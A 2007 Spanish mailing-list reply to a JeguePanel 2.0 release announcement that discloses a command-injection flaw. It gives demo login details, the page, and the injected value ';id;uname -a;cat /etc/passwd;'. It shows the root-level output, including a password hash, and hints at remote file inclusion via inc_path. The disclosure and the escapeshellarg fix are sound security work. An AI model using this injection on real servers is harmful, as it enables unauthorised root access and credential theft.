[U-co] [OT] Anuncio: JeguePanel 2.0 – Más potencia para su red

Fernando Muñoz munozferna en gmail.com
Mar Nov 6 03:20:49 UTC 2007 

Saludos,

Esta aplicacion es vulnerable a inyeccion de parametros a la funcion
exec(), y al parecer ejecuta estos comandos siempre como root, o al
menos en el server demo.  Se debe utilizar la funcion
http://www.php.net/escapeshellarg para evitar estos problemas. Para
ver a que me refiero, inicien sesion en la aplicacion :

http://demo.jeguepanel.net:8080/ user: jegue pass: demo

Luego en http://demo.jeguepanel.net:8080/jeguepanel/mail/domains/domains_add.php
como dominio pongan  ;id;uname -a;cat /etc/passwd; y click en
Adicionar.

Podran ver en el resultado:

 uid=0(root) gid=0(root)
Linux server.anahuac.biz 2.6.17-10-server #2 SMP Tue Dec 5 22:29:32
UTC 2006 i686 GNU/Linux
root:$1$gMFy9Okb$3.Rlscc8OM5j/k29lmPkp.:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync

Esto podria permitir a cualquiera con acceso al panel, ejecutar
comandos en el servidor. Otro detalle que note es en el archivo
menu.php donde utilizan la variable inc_path en un include sin haberla
definido, si el php del server esta configurado con register_globals
on, y allow_url_fopen 1, permite ejecucion de codigo, sin necesidad de
tener acceso al panel.

http://demo.jeguepanel.net:8080/jeguepanel/mail/config/menu.php?inc_path=X

On 11/5/07, Elkin Botero <ebotero en gmail.com> wrote:
> Hola amigos, comparto el anuncio del lanzamiento de la version 2.0 de
> JeguePanel, proyecto desarrollado por mi amigo Anahuac de Paula Gil de
> Brasil.
>
> /JeguePanel llega a la versión 2.0 trayendo diversas opciones para
> administración de redes Gnu/Linux y Windows, incluyendo soporte total
> para ActiveDirectory y bases de datos MySQL y PostgreSQL./
> "Organización" es el concepto que viabiliza la reducción de costos y
> gastos en tecnología de la información. Y la administración eficiente de
> servidores, usuarios, permisos y recursos es la base de la organización
> de una red de computadoras de cualquier tamaño. Y esta es la función de
> JeguePanel, una herramienta de administración de servidores y servicios,
> orientada principalmente para la administración de recursos compartidos
> con Samba y también correo electrónico.
>
> Después del éxito de la serie 1.x, JeguePanel llega ahora a la versión
> 2.0 con varias novedades. Desaparece la obligatoriedad del uso de
> OpenLDAP para almacenar los usuarios y sus informaciones, entrando en
> escena una opción más: el uso de base de datos SQL. Esta opción es la
> respuesta a los pedidos de los usuarios de JeguePanel que ya disponen de
> información de sus usuarios en bases de datos y no desean migrarla para
> otras opciones. A partir de esta versión es posible migrar los datos de
> bases Access, SQL Server u Oracle para MySQL o PostgreSQL.
>
> Un nuevo soporte para Active Directory, permite el uso de la herramienta
> en redes Windows configuradas con este servicio, logrando la total
> integración de los usuarios y sus cuentas e informaciones adicionales.
> Una opción excelente para empresas que poseen su base de usuarios ya
> configuradas en Windows y que quieran tener un nuevo servidor de correo
> electrónico robusto y potente.
> Su interfaz, simple e intuitiva, facilita el mantenimiento de cualquier
> número de usuarios y reduce el trabajo del administrador de redes que no
> ya no requiere horas de configuración de replicaciones entre servidores
> o intentando descubrir quién es un determinado usuario. Con algunos
> pocos clic en la interfaz basada en web, todas las tareas
> administrativas relacionadas con cuentas de usuarios y correo
> electrónico son ejecutadas fácilmente.
>
> Pero no solamente de correo electrónico vive JeguePanel. También permite
> la administración y mantenimiento de recursos de red en servidores
> basados en Samba, proveyendo así un nuevo paso para la administración
> eficiente de los recursos de la red y de sus permisos de acceso, estando
> también totalmente integrado con los permisos de servidores Gnu/Linux
> y/o Windows.
>
> Junto con estas novedades, varias correcciones y otras funcionalidades
> fueron agregadas en la nueva versión:
>
>     *
>
>       Nuevo instalador que usa Ajax con diversas correcciones.
>
>     *
>
>       El idioma del proyecto, a partir de la versión 2.0 será inglés.
>       Esto significa que será necesario utilizar gettext para traducir
>       la interfaz para Español. Nuestro equipo hace la traducción y
>       todos los hispanoparlantes continuarán disfrutando de la interfaz
>       en su idioma nativo.
>
>     *
>
>       Postdata o "firma general" por dominio. Esta opción permite que se
>       incluya un texto al pie de cada uno de los mensajes que sean
>       enviados por los usuarios del servidor.
>
>     *
>
>       Soporte para Active Directory. Es posible mantener sincronizados
>       los usuarios del servidor Windows 2003 Server con el JeguePanel.
>       Para esto fue desarrollado un agente que corre en el servidor W2K3
>       enviando la información al servicio OpenLDAP, usado por
>       JeguePanel, y viceversa. Estos agentes son usados para crear
>       usuarios y para cambiar claves. El resto de las informaciones,
>       como el nombre y el apellido, son sincronizadas por el nuevo
>       jpsync, un programa realizado en Perl que detecta los cambios y
>       los replica.
>
>     *
>
>       Base de datos SQL. A partir de la versión 2.0 JeguePanel se libera
>       del OpenLDAP y permite que se utilice SQL como base de usuarios,
>       dominios, claves e informaciones. Excepto para el caso que se
>       utilice la extensión para Active Directory, donde OpenLDAP es
>       obligatorio.
>
>     *
>
>       Nueva interfaz para definir, por dominio, el mensaje de retorno de
>       correo negado, infectado por un virus.
>
>     *
>
>       A partir de esta versión, los usuarios deshabilitados por haber
>       llenado su cuota de disco quedan imposibilitados de recibir nuevos
>       mensajes y también de enviar mensajes.
>
>     *
>
>       Nueva sintaxis para la devolución de textos cifrados base64,
>       evitando la mayoría de los errores al salvar textos en los campos
>       de retorno de los mensajes.
>
>     *
>
>       Fue mejorado el soporte al Egroupware. JeguePanel cuenta ahora con
>       una herramienta para agregar/borrar aplicativos a diversos
>       usuarios a la misma vez;
>
>     *
>
>       El jpr.pl responsable por la generación de los reportes del
>       Postfix es ahora un daemon que revisa el archivo mail.log y
>       registra las informaciones de cada mensaje en una base Sqlite. Así
>       la recopilación de información es instantánea y muy liviana.
>
>     *
>
>       La función de agregar un dominio fue modificada, buscando acelerar
>       su desempeño. Lo que antes se realizaba mediante un shell script
>       ahora se hace utilizando el comando postconf.
>
>     *
>
>       El soporte al anti-virus ClamAV fue modificado. No se utiliza más
>       el comando clamscan, que ha sido reemplazado por el comando
>       clamdscan que utiliza el daemon del ClamAV. Este cambio permite
>       que la tarea de revisar los mensajes sea mucho más eficiente.
>
> Conozca el JeguePanel en la http://www.jeguepanel.net
> <http://www.jeguepanel.net/> y haga su propia prueba on-line. Las
> opciones de administración de su red son diversas, independientemente
> del tamaño y la plataforma.
>
>
>
> --
> Ubuntu-co mailing list
> Ubuntu-co en lists.ubuntu.com
> https://lists.ubuntu.com/mailman/listinfo/ubuntu-co
>

Más información sobre la lista de distribución Ubuntu-co